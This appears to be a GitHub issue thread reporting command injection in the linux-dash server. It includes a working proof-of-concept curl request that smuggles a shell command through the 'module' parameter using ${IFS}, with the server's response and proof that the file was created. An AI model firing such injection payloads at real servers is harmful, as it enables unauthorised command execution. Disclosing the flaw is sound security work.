injection vulnerabilities

[jefimm]

https://github.com/afaqurk/linux-dash/blob/master/app/server/index.js#L76
and
https://github.com/afaqurk/linux-dash/blob/master/app/server/index.py#L30
are lacking escaping and are vulnerable to command injection

[calderonth]

How to exploit the Python server:
python index.py --port 8080

Trigger the command injection:

curl -v 'http://localhost:8080/server/?module=$(touch${IFS}/tmp/uhoh)' 
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /server/?module=$(touch$IFS/tmp/uhoh) HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: BaseHTTP/0.3 Python/2.7.18
< Date: Tue, 20 Apr 2021 15:09:56 GMT
< Content-type: text/html
< 
{\"success\":false,\"status\":\"Invalid module\"}

Verify:

ls -ltr /tmp/uhoh                                         
-rw-rw-r-- 1 thomas thomas 0 Apr 20 16:09 /tmp/uhoh

[milansimek]

@tariqbuilds Maybe you should archive the project or put a warning in the readme as long as this isn't patched?